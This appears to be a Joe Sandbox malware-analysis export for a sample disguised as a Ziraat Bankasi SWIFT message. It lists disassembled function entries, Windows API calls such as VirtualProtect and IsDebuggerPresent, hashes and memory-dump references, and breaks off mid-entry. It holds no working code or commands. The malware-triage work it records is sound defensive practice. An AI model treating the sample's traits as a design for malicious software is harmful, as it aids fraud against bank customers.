Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
Instruction ID: 20658001b5d3e772b3beb9e94930573caf143eedd2dc719f2536c37ffc57a8c4
Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
Instruction Fuzzy Hash: DAE0C2B12007804ACA24663A6E84FF733CC0F45312B04080EB419F3143CF60E84084A4

Function 000A2322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 000A22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,000A24F1), ref: 000A2303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000A25A1
CoInitialize.OLE32(00000000), ref: 000A2618
CloseHandle.KERNEL32(00000000), ref: 0011503A

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: 4e547d83b41effb33ce02bc4667b9deb4b4c8e1ca267db36db6ac899f5906310
Instruction ID: c41c45a9437da3a75e4d029fc363f77012cce38635550797ed3bbf193b5c5b11
Opcode Fuzzy Hash: 4e547d83b41effb33ce02bc4667b9deb4b4c8e1ca267db36db6ac899f5906310
Instruction Fuzzy Hash: 9F71CFB4901281AFC304EFAEEEA0498BBA4B75A3447AC452ED50AD7F72DBB04494DF54

Function 000A3A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 000A3A73

Part of subcall function 000C1405: __lock.LIBCMT ref: 000C140B

Part of subcall function 000A3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 000A3AF3
Part of subcall function 000A3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000A3B08

Part of subcall function 000A3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,000A3AA3,?), ref: 000A3D45
Part of subcall function 000A3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,000A3AA3,?), ref: 000A3D57
Part of subcall function 000A3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00161148,00161130,?,?,?,?,000A3AA3,?), ref: 000A3DC8
Part of subcall function 000A3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,000A3AA3,?), ref: 000A3E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000A3AB3

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
String ID:
API String ID: 924797094-0
Opcode ID: ff5015a8c5c2151ba2c5721e7a820229386779e2374afd8540db57199fa998aa
Instruction ID: dce6867f7dada96840acdb67aa47c9cb55f5b71aefa00856947996d8a874770d
Opcode Fuzzy Hash: ff5015a8c5c2151ba2c5721e7a820229386779e2374afd8540db57199fa998aa
Instruction Fuzzy Hash: 2B11CD71908341EBC700EF69EC0598EFFE8FB96350F00891EF584876A2DBB08581CB92

Function 000CE9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 000CEA29
__close_nolock.LIBCMT ref: 000CEA42

Part of subcall function 000C7BDA: __getptd_noexit.LIBCMT ref: 000C7BDA

Part of subcall function 000C7C0E: __getptd_noexit.LIBCMT ref: 000C7C0E

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: 64f8d489525c0d9479e0bf70428fe7f885718b52a902246ec3949ed9d18169fe
Instruction ID: 6d93127bbaf5d2d0a96f85c63c095d49b43f4977a67c53f3561a2cdc8980e794
Opcode Fuzzy Hash: 64f8d489525c0d9479e0bf70428fe7f885718b52a902246ec3949ed9d18169fe
Instruction Fuzzy Hash: CA11A9725056909FD722BF64C841F9D7A916F41335F16434CE4245F1E3CBB49C408BA2

Function 000BF4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 000C395C: __FF_MSGBANNER.LIBCMT ref: 000C3973
Part of subcall function 000C395C: __NMSG_WRITE.LIBCMT ref: 000C397A
Part of subcall function 000C395C: RtlAllocateHeap.NTDLL(00BC0000,00000000,00000001,00000001,00000000,?,?,000BF507,?,0000000E), ref: 000C399F

std::exception::exception.LIBCMT ref: 000BF51E
__CxxThrowException@8.LIBCMT ref: 000BF533

Part of subcall function 000C6805: RaiseException.KERNEL32(?,?,0000000E,00156A30,?,?,?,000BF538,0000000E,00156A30,?,00000001), ref: 000C6856

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 66a2bfd4d189d1b12dd586df57a361aeb7f77c72734e3bf45a1f5d9801fed317
Instruction ID: badef130bff93fb32d87a5716aff6623f6482b291bf9b7375c45d89b5e60b59d
Opcode Fuzzy Hash: 66a2bfd4d189d1b12dd586df57a361aeb7f77c72734e3bf45a1f5d9801fed317
Instruction Fuzzy Hash: FDF0A43110421EA7DB24BF98ED02EEE77ECAF04354F604529FA08A3182DFB1964486A6

Function 000C35E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000C7C0E: __getptd_noexit.LIBCMT ref: 000C7C0E

__lock_file.LIBCMT ref: 000C3629

Part of subcall function 000C4E1C: __lock.LIBCMT ref: 000C4E3F

__fclose_nolock.LIBCMT ref: 000C3634

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: e8c76c93cf4bc6c146c74ab532dae0974545e3d59b3c9d43593d6ef2d4d499de
Instruction ID: 0b0399f2f28038aef7441e566fa29a398dea6c3c5592ccbc5c05de695be8f2b7
Opcode Fuzzy Hash: e8c76c93cf4bc6c146c74ab532dae0974545e3d59b3c9d43593d6ef2d4d499de
Instruction Fuzzy Hash: 18F0B471911604AAD7217B658802FAE7AE06F41334F25C10DE425AB2C3CB7C8A019F95

Function 00C05B78 Relevance: 1.7, APIs: 1, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 00C053E8: GetFileAttributesW.KERNELBASE(?), ref: 00C053F3

CreateDirectoryW.KERNELBASE(?,00000000), ref: 00C05CDD

Memory Dump Source

Source File: 00000000.00000002.1339065104.0000000000C04000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C04000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c04000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: c4b3a7744b86d5dd1fd7d8b1894a2cd98a50a3f8fca7259af21b41d47ae2183e
Instruction ID: d9a080e8f2bee5a685fd6646aae528f8818793b439d7b32ef3b53de3f34c83a4
Opcode Fuzzy Hash: c4b3a7744b86d5dd1fd7d8b1894a2cd98a50a3f8fca7259af21b41d47ae2183e
Instruction Fuzzy Hash: 63517D31A1060897EF14DFA0D895BEF733AEF58700F004569E60DEB2D0EA759B45CBA5

Function 000C2957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 000C2A0B

Part of subcall function 000C7C0E: __getptd_noexit.LIBCMT ref: 000C7C0E

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction ID: 663b013d2c28d8d34de5b98605ab9d623de1e9bf79416267ba542e996e0b9475
Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction Fuzzy Hash: B5419131600706AFDB789FA9C880FAE7BE6EF45360F24853DE855C7A81EA70DD418B41

Function 000BED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 000BEDC7

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: f28b353592553d64c504c1fce29fc6519e08ed3e9f7da4b8bab567cb04fc3ea5
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 6631D074A001469BC768DF58C480AE9FBE6FF59340B6486A5E40ACB366DB70EDC1DB80

Function 00119A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00119A80

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: b8a1c8f70e9a96bc5b07d3aba2984fc4d06cd1112767532878fcd18d301f9656
Instruction ID: dcf987c64a7d2d676c02e7b2fb9a798a9db7f7a842216a427e1d07f2d3bb0406
Opcode Fuzzy Hash: b8a1c8f70e9a96bc5b07d3aba2984fc4d06cd1112767532878fcd18d301f9656
Instruction Fuzzy Hash: AE416D70508651CFDB24DF18C494BAABBE0BF45304F1989ACE99A4B362C372F885CF52

Function 000A41A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 000A4214: FreeLibrary.KERNEL32(00000000,?), ref: 000A4247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,000A39FE,?,00000001), ref: 000A41DB

Part of subcall function 000A4291: FreeLibrary.KERNEL32(00000000), ref: 000A42C4

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: 4eb210c4021fe1e4fb73e6016911f6e15cdfa8167ca5242453cc80aab3d0b57e
Instruction ID: 5ba843ba0b21fd87b93c45fc1f3799af0eba9cbe1d525c462e237de48da49de1
Opcode Fuzzy Hash: 4eb210c4021fe1e4fb73e6016911f6e15cdfa8167ca5242453cc80aab3d0b57e
Instruction Fuzzy Hash: 1A11C435600206ABDB24ABB4DC06FDE77A99F81700F508429B596A6182DBB49A459B60

Function 00119B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00119B51

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 47aee82db8f8308ed41b5716d9463fe9abf8b3e670789426141a34af0d5f03c9
Instruction ID: 745de6346cf8b283ae9593c0052f453423f04f4fe3e7821b89e8e2b578c8350f
Opcode Fuzzy Hash: 47aee82db8f8308ed41b5716d9463fe9abf8b3e670789426141a34af0d5f03c9
Instruction Fuzzy Hash: 37210570508601CFDB24DF68C444BABBBE1BF85304F15496CEA9A5B662C732E885CF52

Function 000CAF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 000CAFC0

Part of subcall function 000C7BDA: __getptd_noexit.LIBCMT ref: 000C7BDA

Part of subcall function 000C7C0E: __getptd_noexit.LIBCMT ref: 000C7C0E

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: 8180935a80fe31a5836cebff89e59fc0b10fa0fde9a6d356de771e48dc9c3093
Instruction ID: 56f7d7466b0dd77733867e47b7347a476051fd790f21c676409a7f840319452b
Opcode Fuzzy Hash: 8180935a80fe31a5836cebff89e59fc0b10fa0fde9a6d356de771e48dc9c3093
Instruction Fuzzy Hash: 5211C4728056109FD7227FA4C847F9E36A1AF52335F26424CE4380F1E3C7B58D408BA2

Function 000A39DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
Instruction ID: 30c4d1e42c4d179743eb295332193ca4a4e850b91a324ee9511ab7625913c864
Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
Instruction Fuzzy Hash: F801863140010AAFCF04EFA4C881CEEBB74AF22344F108029B51597196EA309A49CB61

Function 000C2AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 000C2AED

Part of subcall function 000C7C0E: __getptd_noexit.LIBCMT ref: 000C7C0E

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: db9ac61e9653ddcaba758d6c7c68aa7210e848a737b8633e053fbaa12f4454e6
Instruction ID: 84dfddd8782e45d06e6195c49f818f35992c3f61cafe1572f6ea2ce03032347a
Opcode Fuzzy Hash: db9ac61e9653ddcaba758d6c7c68aa7210e848a737b8633e053fbaa12f4454e6
Instruction Fuzzy Hash: C7F06231900205EBDF71AF658C06FDF36A5BF00310F16451DB4149B593D7B98A62DB52

Function 000A4252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,000A39FE,?,00000001), ref: 000A4286

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 932a3fa3c9b59297f703f9f198f0be05048a4266c65f39c9cceffa80dc4bc78e
Instruction ID: 0152178f3c74608e473d5ccc32b9477b26297e3c8342b9af3b514cfea8c99fd4
Opcode Fuzzy Hash: 932a3fa3c9b59297f703f9f198f0be05048a4266c65f39c9cceffa80dc4bc78e
Instruction Fuzzy Hash: F5F03075505701DFCB749FA4D490916F7E4FF453153658A3EF1D682910C7B19940DF50

Function 000A40A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000A40C6

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 12c7acf457f416ea4a736d7ffb1e62182f8bf8f5273f239c8f0233dfa6dff11f
Instruction ID: 26895caba1d4f549b59255ba6a6668661b92a71810529d7d44aab0cf62a7beb0
Opcode Fuzzy Hash: 12c7acf457f416ea4a736d7ffb1e62182f8bf8f5273f239c8f0233dfa6dff11f
Instruction Fuzzy Hash: CBE0C2366002246BC721A798DC46FFE77ADDF886A0F0900B5F909E7245DE64A9C19A91

Function 000A660F Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000A53B1,?,?,000A61FF,?,00000000,00000001,00000000), ref: 000A662F

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: FullNamePath
String ID:
API String ID: 608056474-0
Opcode ID: 147c0656f2e1376490407abfd66b10415be94563efb4557673d5b1f3d77aa3a7
Instruction ID: 2cc238e98c209bd545acfc9ae4cd14e30a54eaac0f2512cf88bd1644d7c276ea
Opcode Fuzzy Hash: 147c0656f2e1376490407abfd66b10415be94563efb4557673d5b1f3d77aa3a7
Instruction Fuzzy Hash: 67E0CD357041156BCB11E374DC42FFD367D9B48B40F040068F109E6195DE949781C792

Function 00C053E8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00C053F3

Memory Dump Source

Source File: 00000000.00000002.1339065104.0000000000C04000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C04000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c04000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 8844739885fd8973b84cefe705d18cdf08bcb3402cb7c15dce15cd2d0f200d70
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: 30E08630525508DBCB10CAE989046EA73A4A704311F104664A815C71C0D5308E80FA54

Function 00C053B8 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00C053C3

Memory Dump Source

Source File: 00000000.00000002.1339065104.0000000000C04000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C04000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c04000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
